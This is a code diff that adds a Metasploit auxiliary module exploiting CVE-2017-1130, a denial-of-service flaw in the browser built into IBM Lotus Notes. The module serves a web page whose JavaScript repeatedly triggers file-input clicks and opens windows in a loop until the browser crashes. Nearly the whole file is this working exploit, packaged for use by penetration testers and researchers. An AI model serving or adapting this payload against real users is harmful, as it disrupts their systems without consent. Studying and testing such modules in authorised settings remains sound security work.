|
| 1 | +## |
| 2 | +# This module requires Metasploit: https://metasploit.com/download |
| 3 | +# Current source: https://github.com/rapid7/metasploit-framework |
| 4 | +## |
| 5 | + |
| 6 | +class MetasploitModule < Msf::Auxiliary |
| 7 | + include Msf::Exploit::Remote::HttpServer |
| 8 | + |
| 9 | + def initialize(info = {}) |
| 10 | + super( |
| 11 | + update_info( |
| 12 | + info, |
| 13 | + 'Name' => "IBM Notes encodeURI DOS", |
| 14 | + 'Description' => %q( |
| 15 | + This module exploits a vulnerability in the native browser that comes with IBM Lotus Notes. |
| 16 | + If successful, the browser will crash after viewing the webpage. |
| 17 | + ), |
| 18 | + 'License' => MSF_LICENSE, |
| 19 | + 'Author' => [ |
| 20 | + 'Dhiraj Mishra', |
| 21 | + ], |
| 22 | + 'References' => [ |
| 23 | + [ 'EXPLOIT-DB', '42604'], |
| 24 | + [ 'CVE', '2017-1130' ] |
| 25 | + ], |
| 26 | + 'DisclosureDate' => 'August 31 2017', |
| 27 | + 'Actions' => [[ 'WebServer' ]], |
| 28 | + 'PassiveActions' => [ 'WebServer' ], |
| 29 | + 'DefaultAction' => 'WebServer' |
| 30 | + ) |
| 31 | + ) |
| 32 | + end |
| 33 | + |
| 34 | + def run |
| 35 | + exploit # start http server |
| 36 | + end |
| 37 | + |
| 38 | + def setup |
| 39 | + @html = %| |
| 40 | +<html><body> |
| 41 | +<input type="file" id="f"> |
| 42 | +<script> |
| 43 | +var w; |
| 44 | +var kins = {}; |
| 45 | +var i = 1; |
| 46 | +f.click(); |
| 47 | +setInterval("f.click()", 1); |
| 48 | +setInterval(function(){ |
| 49 | + for (var k in kins) { |
| 50 | + if (kins[k] && kins[k].status === undefined) { |
| 51 | + kins[k].close(); |
| 52 | + delete kins[k]; |
| 53 | + } |
| 54 | + } |
| 55 | + w = open('data:text/html,<input type=file id=f><script>f.click();setInterval("f.click()", 1);<\/script>'); |
| 56 | + if (w) { |
| 57 | + kins[i] = w; |
| 58 | + i++; |
| 59 | + } |
| 60 | +}, 1); |
| 61 | +</script> |
| 62 | +</body></html> |
| 63 | + | |
| 64 | + end |
| 65 | + |
| 66 | + def on_request_uri(cli, _request) |
| 67 | + print_status('Sending response') |
| 68 | + send_response(cli, @html) |
| 69 | + end |
| 70 | +end |
0 commit comments